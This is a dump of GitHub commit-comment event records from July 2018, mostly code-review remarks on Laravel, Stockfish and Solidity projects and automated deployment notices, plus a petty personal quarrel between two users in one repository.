{"id":"7958721736","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29691194,"position":null,"line":null,"path":null,"commit_id":"389035385abe607363391e15a98db4ebfb4447a9","created_at":"2018-07-12T21:08:55Z","updated_at":"2018-07-12T21:08:55Z","author_association":"MEMBER","body":"@vak2ve, It's really exciting to open the files and see how many 'closer//datelines' and 'date/@calendar', etc. you've added.  I hope the quick fixes have helped ease the burden! If you have any ideas for tweaks or additional needs please let me know."}},"created_at":"2018-07-12T21:08:55Z"}
{"id":"7958721836","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29691195,"position":null,"line":null,"path":null,"commit_id":"02f82b7213ad025d8e3d91ca6b6a6412a31dff03","created_at":"2018-07-12T21:08:57Z","updated_at":"2018-07-12T21:08:57Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-210856 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-210856\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T21:08:57Z"}
{"id":"7958722117","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691196,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:09:01Z","updated_at":"2018-07-12T21:09:01Z","author_association":"NONE","body":"so if a random person on the internet says im '12' as you think i am, you believe them without them proving it?"}},"created_at":"2018-07-12T21:09:01Z"}
{"id":"7958722639","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691197,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:09:09Z","updated_at":"2018-07-12T21:09:09Z","author_association":"NONE","body":"that is hilarious"}},"created_at":"2018-07-12T21:09:09Z"}
{"id":"7958723653","type":"CommitCommentEvent","actor":{"login":"zsinx6"},"repo":{"name":"zsinx6/musthe"},"payload":{"comment":{"id":29691201,"position":null,"line":null,"path":null,"commit_id":"914e0f268c5a41e0d0593836642c9eff8c0872e5","created_at":"2018-07-12T21:09:21Z","updated_at":"2018-07-12T21:09:21Z","author_association":"OWNER","body":"I will change this, thanks for the advice"}},"created_at":"2018-07-12T21:09:21Z"}
{"id":"7958723901","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691204,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:09:24Z","updated_at":"2018-07-12T21:09:24Z","author_association":"OWNER","body":"You consistently post your birth date in response, you say you're 14. is that wrong? or another lie."}},"created_at":"2018-07-12T21:09:24Z"}
{"id":"7958725304","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691206,"position":25,"line":21,"path":"app/Cart.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:09:43Z","updated_at":"2018-07-12T21:09:43Z","author_association":"COLLABORATOR","body":"Declarar arrays dessa forma:\r\n\r\n```php\r\n$var = ['foo', 'bar'];\r\n```\r\n\r\nEm vez de:\r\n\r\n```php\r\n$var = array('foo', 'bar');\r\n```"}},"created_at":"2018-07-12T21:09:43Z"}
{"id":"7958726495","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29691207,"position":36,"line":42,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T21:09:58Z","updated_at":"2018-07-12T21:09:58Z","author_association":"OWNER","body":"I knew this question was coming. I have not coded the web yet, but the idea is to call the function with the passwords already hashed from the outside. \r\nAfter considering what was the best way to manage the password, I thought that calling the function with the passwords in plain test is really risky, even if eventually the contract hashes and stores in the contract. Someone might be monitoring the transactions and identify the calls to the function and parse the passwords out of the data.\r\nAm I right with this approach ?"}},"created_at":"2018-07-12T21:09:58Z"}
{"id":"7958727544","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691214,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:10:12Z","updated_at":"2018-07-12T21:10:12Z","author_association":"NONE","body":"you have got a discord suspended too, the one before your current one"}},"created_at":"2018-07-12T21:10:12Z"}
{"id":"7958728066","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691215,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:10:18Z","updated_at":"2018-07-12T21:10:18Z","author_association":"NONE","body":"and its a lie"}},"created_at":"2018-07-12T21:10:18Z"}
{"id":"7958729593","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691220,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:10:38Z","updated_at":"2018-07-12T21:10:38Z","author_association":"OWNER","body":"No, lol. My old one still works, it doesn't say deleted user."}},"created_at":"2018-07-12T21:10:38Z"}
{"id":"7958730145","type":"CommitCommentEvent","actor":{"login":"bitti"},"repo":{"name":"aws/chalice"},"payload":{"comment":{"id":29691223,"position":28,"line":28,"path":"docs/source/topics/multifile.rst","commit_id":"1a28a5740129c5b1bafb9e0717426b99988f8230","created_at":"2018-07-12T21:10:45Z","updated_at":"2018-07-12T21:10:45Z","author_association":"NONE","body":"This and the other code blocks don't show up in the standard github view. Is it due to the `..` prefix?"}},"created_at":"2018-07-12T21:10:45Z"}
{"id":"7958731993","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691230,"position":76,"line":53,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:11:10Z","updated_at":"2018-07-12T21:11:10Z","author_association":"COLLABORATOR","body":"Comentário não padronizado.\r\n\r\nSeguir padrão:\r\nhttps://guidelines.bubb.com.br/code-style/laravel-php#comentarios"}},"created_at":"2018-07-12T21:11:10Z"}
{"id":"7958732832","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691232,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:11:19Z","updated_at":"2018-07-12T21:11:19Z","author_association":"NONE","body":"whatever"}},"created_at":"2018-07-12T21:11:19Z"}
{"id":"7958734382","type":"CommitCommentEvent","actor":{"login":"tonykaralis"},"repo":{"name":"PoLaKoSz/MoodMovies"},"payload":{"comment":{"id":29691236,"position":19,"line":12,"path":"MoodMovies/ViewModels/MovieCardViewModel.cs","commit_id":"c8f34e5607a0c47458472c407344814bde8cadd5","created_at":"2018-07-12T21:11:37Z","updated_at":"2018-07-12T21:11:37Z","author_association":"NONE","body":"@PoLaKoSz thanks for doing this. I have been meaning to reove all those properties for some time now."}},"created_at":"2018-07-12T21:11:37Z"}
{"id":"7958734642","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/raceready"},"payload":{"comment":{"id":29691237,"position":null,"line":null,"path":null,"commit_id":"5227b8baac4e5e94e7e9ce5bf16bdd3cdb6a7044","created_at":"2018-07-12T21:11:39Z","updated_at":"2018-07-12T21:11:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0fc11092-0119-4ab8-a5f0-6cbf19d20e03?env_id=ibm%3Ayp%3Aeu-gb \"raceready-drivetrain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8de9b026-388d-4ebc-984e-5928d63a1d84?env_id=ibm%3Ayp%3Aeu-gb \"drivetrain\") deployed [raceready](https://github.com/rosscado/raceready/releases/tag/deploy-ibm-yp-eu-gb-VeloWare-staging-20180712-211137 \"deploy-ibm-yp-eu-gb-VeloWare-staging-20180712-211137\") to [staging](https://console.bluemix.net/apps/23d83a9d-7943-46e3-b4ec-d36604aa66e2?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:VeloWare:staging\"), including this commit"}},"created_at":"2018-07-12T21:11:39Z"}
{"id":"7958735182","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691238,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:11:46Z","updated_at":"2018-07-12T21:11:46Z","author_association":"NONE","body":"oh i got another question before i go, what in the fucking hell gives you the right to take the name POC, and i was using it?"}},"created_at":"2018-07-12T21:11:46Z"}
{"id":"7958735525","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29691240,"position":null,"line":null,"path":null,"commit_id":"94b0ee37c78ebdcbfba6e2d2bceb35edcc500abf","created_at":"2018-07-12T21:11:51Z","updated_at":"2018-07-12T21:11:51Z","author_association":"COLLABORATOR","body":"Zeile1135: Brise, bitte korrigieren."}},"created_at":"2018-07-12T21:11:51Z"}
{"id":"7958736207","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691241,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:12:00Z","updated_at":"2018-07-12T21:12:00Z","author_association":"NONE","body":"and you telling toonj not to talk to broadway is hilarious"}},"created_at":"2018-07-12T21:12:00Z"}
{"id":"7958736615","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691244,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:12:06Z","updated_at":"2018-07-12T21:12:06Z","author_association":"OWNER","body":"you don't own the name POC, also i gave you the source code that one ran under. 😂 "}},"created_at":"2018-07-12T21:12:06Z"}
{"id":"7958736664","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29691246,"position":null,"line":null,"path":null,"commit_id":"817e8082cc375aebde4b4103792ee529818c6a56","created_at":"2018-07-12T21:12:07Z","updated_at":"2018-07-12T21:12:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updatersyn](https://updatersyn-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/817e8082cc375aebde4b4103792ee529818c6a56/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-12T21:12:07Z"}
{"id":"7958736912","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691248,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:12:10Z","updated_at":"2018-07-12T21:12:10Z","author_association":"NONE","body":"and threatening him too"}},"created_at":"2018-07-12T21:12:10Z"}
{"id":"7958738486","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691251,"position":78,"line":55,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:12:29Z","updated_at":"2018-07-12T21:12:29Z","author_association":"COLLABORATOR","body":"Declarar arrays neste formato:\r\n\r\n```php\r\n$data = [\r\n    'cart_id' => ....\r\n];\r\n```\r\n\r\nRepare na abertura e fechamento das chaves"}},"created_at":"2018-07-12T21:12:29Z"}
{"id":"7958739101","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691255,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:12:36Z","updated_at":"2018-07-12T21:12:36Z","author_association":"OWNER","body":"never threatened him. Seems you can't stay on topic when you have no more room to talk, that 'whatever' really shows you've been beat. 😢 "}},"created_at":"2018-07-12T21:12:36Z"}
{"id":"7958739608","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29691256,"position":null,"line":null,"path":null,"commit_id":"e841ba3c11049243876057b7e9048cdb2b25d86e","created_at":"2018-07-12T21:12:41Z","updated_at":"2018-07-12T21:12:41Z","author_association":"NONE","body":"Line 341 of evaluate.cpp:\r\n\r\n```\r\nif (pos.pieces(PAWN) & (s + Up))\r\n```\r\n\r\nThis code would trigger an assert in line 109 of bitboard.h when s is on the eighth rank, because `s+Up` is out of bounds.\r\n\r\nThe following would work, however:\r\n\r\n```\r\nif (shift<Down>(pos.pieces(PAWN)) & s)\r\n```"}},"created_at":"2018-07-12T21:12:41Z"}
{"id":"7958739932","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691257,"position":93,"line":61,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:12:45Z","updated_at":"2018-07-12T21:12:45Z","author_association":"COLLABORATOR","body":"Faltou uma quebra de linha aqui."}},"created_at":"2018-07-12T21:12:45Z"}
{"id":"7958740134","type":"CommitCommentEvent","actor":{"login":"matyasselmeci"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29691258,"position":null,"line":null,"path":null,"commit_id":"0fc67c5f3b154be44342163494f898e9e0aedc86","created_at":"2018-07-12T21:12:48Z","updated_at":"2018-07-12T21:12:48Z","author_association":"NONE","body":"Does `:::file` give you any benefits?"}},"created_at":"2018-07-12T21:12:48Z"}
{"id":"7958741236","type":"CommitCommentEvent","actor":{"login":"nmoorenz"},"repo":{"name":"nmoorenz/R4DS"},"payload":{"comment":{"id":29691259,"position":18,"line":18,"path":"13 Relational Data.R","commit_id":"27d8523750c41100cb5007f4c66073dce5fcfddb","created_at":"2018-07-12T21:13:01Z","updated_at":"2018-07-12T21:13:01Z","author_association":"OWNER","body":"I think this is a comment"}},"created_at":"2018-07-12T21:13:01Z"}
{"id":"7958742189","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691262,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:13:14Z","updated_at":"2018-07-12T21:13:14Z","author_association":"OWNER","body":"Also i told him not to because that was back when drama was happening 24/7 and he only contributed it, remember when you got mad because he was sending stuff about you to broadway? Yeah i remember that."}},"created_at":"2018-07-12T21:13:14Z"}
{"id":"7958742943","type":"CommitCommentEvent","actor":{"login":"int-index"},"repo":{"name":"clash-lang/ghc-typelits-natnormalise"},"payload":{"comment":{"id":29691264,"position":null,"line":null,"path":null,"commit_id":"23949e48f1603e3c90a83974fc322935856065cb","created_at":"2018-07-12T21:13:23Z","updated_at":"2018-07-12T21:13:23Z","author_association":"NONE","body":"Since only 8.0+ is supported another option is to replace all uses of `*` with `Type` and avoid conditionals."}},"created_at":"2018-07-12T21:13:23Z"}
{"id":"7958743346","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691265,"position":102,"line":66,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:13:28Z","updated_at":"2018-07-12T21:13:28Z","author_association":"COLLABORATOR","body":"Evitar dar nomes sem contexto para as variáveis. Sugestão: `$quantity`"}},"created_at":"2018-07-12T21:13:28Z"}
{"id":"7958744945","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691271,"position":150,"line":97,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:13:50Z","updated_at":"2018-07-12T21:13:50Z","author_association":"COLLABORATOR","body":"Faltou uma quebra de linha aqui,"}},"created_at":"2018-07-12T21:13:50Z"}
{"id":"7958745928","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691273,"position":155,"line":100,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:14:03Z","updated_at":"2018-07-12T21:14:03Z","author_association":"COLLABORATOR","body":"Faltou uma quebra de linha."}},"created_at":"2018-07-12T21:14:03Z"}
{"id":"7958745996","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/raceready"},"payload":{"comment":{"id":29691274,"position":null,"line":null,"path":null,"commit_id":"5227b8baac4e5e94e7e9ce5bf16bdd3cdb6a7044","created_at":"2018-07-12T21:14:04Z","updated_at":"2018-07-12T21:14:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0fc11092-0119-4ab8-a5f0-6cbf19d20e03?env_id=ibm%3Ayp%3Aeu-gb \"raceready-drivetrain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8de9b026-388d-4ebc-984e-5928d63a1d84?env_id=ibm%3Ayp%3Aeu-gb \"drivetrain\") deployed [raceready](https://github.com/rosscado/raceready/releases/tag/deploy-ibm-yp-eu-gb-VeloWare-prod-20180712-211403 \"deploy-ibm-yp-eu-gb-VeloWare-prod-20180712-211403\") to [prod](https://console.bluemix.net/apps/8a5f3a5c-0143-4065-8ef7-98f3c822def8?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:VeloWare:prod\"), including this commit"}},"created_at":"2018-07-12T21:14:04Z"}
{"id":"7958747279","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691279,"position":174,"line":119,"path":"app/Http/Controllers/CartController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:14:21Z","updated_at":"2018-07-12T21:14:21Z","author_association":"COLLABORATOR","body":"Não é necessário converter o valor para inteiro. O PHP já faz isso por default."}},"created_at":"2018-07-12T21:14:21Z"}
{"id":"7958748897","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691288,"position":26,"line":27,"path":"app/Http/Controllers/ProductController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:14:43Z","updated_at":"2018-07-12T21:14:43Z","author_association":"COLLABORATOR","body":"Evitar deixar código comentado."}},"created_at":"2018-07-12T21:14:43Z"}
{"id":"7958750352","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691293,"position":140,"line":87,"path":"app/Http/Controllers/ProductController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:15:02Z","updated_at":"2018-07-12T21:15:02Z","author_association":"COLLABORATOR","body":"Evitar deixar código comentado."}},"created_at":"2018-07-12T21:15:02Z"}
{"id":"7958753872","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29691311,"position":null,"line":null,"path":null,"commit_id":"5d92213a587f3068e33d21695fedd4137993e763","created_at":"2018-07-12T21:15:48Z","updated_at":"2018-07-12T21:15:48Z","author_association":"COLLABORATOR","body":"@halonazhao Were the following files not supposed to be removed: Math.hs, SentenceExtract.hs, Extract.hs, and ExprExtract.hs? Why hasn't make been breaking?"}},"created_at":"2018-07-12T21:15:48Z"}
{"id":"7958754994","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691316,"position":5,"line":11,"path":"app/Product.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:16:04Z","updated_at":"2018-07-12T21:16:04Z","author_association":"COLLABORATOR","body":"Erro de sintaxe aqui hein.\r\n\r\nCorreto:\r\n\r\n```php\r\nreturn $this->hasMany('App\\Cart_Item');\r\n```"}},"created_at":"2018-07-12T21:16:04Z"}
{"id":"7958755941","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29691319,"position":58,"line":63,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T21:16:16Z","updated_at":"2018-07-12T21:16:16Z","author_association":"OWNER","body":"oops. I need to send the funds to the exchange not Bob. I will change accordingly."}},"created_at":"2018-07-12T21:16:16Z"}
{"id":"7958756525","type":"CommitCommentEvent","actor":{"login":"rynowak"},"repo":{"name":"aspnet/Blazor"},"payload":{"comment":{"id":29691320,"position":5,"line":39,"path":"src/Microsoft.AspNetCore.Blazor.Server/Circuits/BlazorHub.cs","commit_id":"5ec54615ad5b2b9ab4b9f090652ffc3d60f1e275","created_at":"2018-07-12T21:16:23Z","updated_at":"2018-07-12T21:16:23Z","author_association":"MEMBER","body":"Yep!"}},"created_at":"2018-07-12T21:16:23Z"}
{"id":"7958757051","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691321,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:16:31Z","updated_at":"2018-07-12T21:16:31Z","author_association":"OWNER","body":"Btw, credit cards are for charging money when you cannot afford it. ;)\r\n\r\nYou must not be able to afford it with real money 😢 "}},"created_at":"2018-07-12T21:16:31Z"}
{"id":"7958760903","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29691334,"position":null,"line":null,"path":null,"commit_id":"b43eb7d1436d69b7d90c81975db8e4cb8cb8f0c3","created_at":"2018-07-12T21:17:23Z","updated_at":"2018-07-12T21:17:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-211722 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-211722\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T21:17:23Z"}
{"id":"7958761273","type":"CommitCommentEvent","actor":{"login":"PoLaKoSz"},"repo":{"name":"PoLaKoSz/MoodMovies"},"payload":{"comment":{"id":29691336,"position":19,"line":12,"path":"MoodMovies/ViewModels/MovieCardViewModel.cs","commit_id":"c8f34e5607a0c47458472c407344814bde8cadd5","created_at":"2018-07-12T21:17:29Z","updated_at":"2018-07-12T21:17:29Z","author_association":"OWNER","body":":smile:"}},"created_at":"2018-07-12T21:17:29Z"}
{"id":"7958761901","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29691338,"position":null,"line":null,"path":null,"commit_id":"5d92213a587f3068e33d21695fedd4137993e763","created_at":"2018-07-12T21:17:38Z","updated_at":"2018-07-12T21:17:38Z","author_association":"COLLABORATOR","body":"I added those files to new folders. No worries. Everything is fine."}},"created_at":"2018-07-12T21:17:38Z"}
{"id":"7958762263","type":"CommitCommentEvent","actor":{"login":"mayraochoa13"},"repo":{"name":"resteybar/MBARI-Interns"},"payload":{"comment":{"id":29691340,"position":null,"line":null,"path":null,"commit_id":"5991168f30f0c55670062acc127a33122ebe3551","created_at":"2018-07-12T21:17:43Z","updated_at":"2018-07-12T21:17:43Z","author_association":"COLLABORATOR","body":"Combined Version for readAnnotations.C + getXMLData.cpp"}},"created_at":"2018-07-12T21:17:43Z"}
{"id":"7958769772","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29691361,"position":null,"line":null,"path":null,"commit_id":"0a96e9f2c7072dca3cb670c713bf785a3ca3cb3d","created_at":"2018-07-12T21:19:26Z","updated_at":"2018-07-12T21:19:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-keywords](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-keywords).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-keywords-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T21:19:26Z"}
{"id":"7958772605","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29691369,"position":null,"line":null,"path":null,"commit_id":"5f557fc372ee0989d0c1d51705af992593117684","created_at":"2018-07-12T21:20:06Z","updated_at":"2018-07-12T21:20:06Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-keywords](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-keywords).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-keywords-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T21:20:06Z"}
{"id":"7958774781","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29691373,"position":null,"line":null,"path":null,"commit_id":"01eee90eabbbb2127046d91009bbdc5a6ac80247","created_at":"2018-07-12T21:20:35Z","updated_at":"2018-07-12T21:20:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display the friends in a list](https://trello.com/c/qKay0CmL/5-display-the-friends-in-a-list)"}},"created_at":"2018-07-12T21:20:35Z"}
{"id":"7958777250","type":"CommitCommentEvent","actor":{"login":"jasonwbarnett"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29691381,"position":132,"line":121,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T21:21:08Z","updated_at":"2018-07-12T21:21:08Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-12T21:21:08Z"}
{"id":"7958777615","type":"CommitCommentEvent","actor":{"login":"jasonwbarnett"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29691383,"position":145,"line":134,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T21:21:13Z","updated_at":"2018-07-12T21:21:13Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-12T21:21:13Z"}
{"id":"7958778157","type":"CommitCommentEvent","actor":{"login":"jasonwbarnett"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29691386,"position":418,"line":630,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T21:21:21Z","updated_at":"2018-07-12T21:21:21Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-12T21:21:21Z"}
